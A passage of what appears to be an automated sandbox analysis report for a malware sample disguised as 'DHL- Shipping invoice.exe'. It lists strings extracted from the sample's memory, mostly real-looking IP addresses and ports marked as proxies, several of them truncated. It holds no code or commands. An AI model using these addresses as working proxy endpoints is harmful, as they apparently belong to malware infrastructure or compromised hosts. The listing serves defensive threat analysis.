                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.186.205.120
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.186.205.120://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.186.205.120:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.186.205.123
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.186.205.123://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.186.205.123:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981363000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.7.109.1:9812
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.7.109.1:9812://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.24.176.79
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.28.195.40:8282://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.33.126.200:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.33.126.200:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.37.121.209:9091
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.37.121.209:9091://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.48.62.239:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.48.62.239:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.225
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.225://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.225:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.128.194.154
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.128.194.154://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.128.194.154:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.13.252.58:61401
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.13.252.58:61401://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.130.172.153:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.130.172.153:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.140.63.249:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.140.63.249:3128://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.159.146.251
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.159.146.251://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.159.146.251:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.200.62.246:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.200.62.246:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C9D000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.206.205.75:4216
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.206.205.75:4216://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.116.150
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.116.150.2:9000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.116.150.2:9000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.129.84.12:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.129.84.12:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98154F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981534000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.143.91.66:38801
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.143.91.66:38801://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.144.6.66:3777
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.144.6.66:3777://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.152.53.25:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.152.53.25:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.202.3.137:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.202.3.137:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.252.179.66:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.252.179.66:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.121.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.121.231:8082
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.121.231:8082://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.139.8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98344F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.139.85:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.139.85:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.41.154:8090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.41.154:8090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.70.153.17:24138
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.70.153.17:24138://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.8.149.77:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.114.43.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.114.43.147:8800
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.114.43.147:8800://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.126.158.50
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.126.158.50://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.126.158.50:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.3:8089x
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.78:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.78:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.132:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.132:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.29:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.29:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.40:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.40:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.47:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.47:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.202.159.108://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.202.159.108:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.202.159.108p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.210.123
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.210.123://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.210.123:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.25.116.228:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.163.236.54:7302
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.163.236.54:7302://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.198.74.90:26976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.198.74.90:26976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.41.228.175:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.41.228.175:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.41.240.177:52480
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.41.240.177:52480://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.122.26.242:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.141.139.112:5566
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.141.139.112:5566://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.141.139.60:5566
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.141.139.60:5566://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981420000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.228.143.207:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.228.143.207:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.228.94.199:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.228.94.199:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.229.149.168:65100
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.229.149.168:65100://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.25.40.3
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.25.40.38:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.25.40.38:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.27.10.84:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.27.10.84:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98161C000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.87.93.81:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.87.93.81:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.99.106.250:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.99.106.250:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.99.106.25:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.99.106.25:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.165.63:34438://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.165.63:49093
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.165.63:49093://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:27102
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:27102://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:51474
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:51474://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.214
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.214.87:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.214.87:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:21605
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:21605://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:33383
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:33383://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.252.41:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.252.41:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.65.182.103:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.65.182.103:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.205.138.174:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.205.138.174:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.47.109
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.47.109://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.47.109:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.234.24.116:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.234.24.116:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.37.89.201:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980109000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.38.176.104:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.38.176.104:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.81.217.201
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.81.217.201://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.81.217.201:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.243.68:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.243.68:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.193.123.34:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.193.123.34:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.255.162.199
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.255.162.199:44234
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.255.162.199:44234://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.255.162.199:44740
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.255.162.199:44740://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98075F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.97:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.196.14.122:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.196.212.172
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.196.212.172://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.196.212.172:80
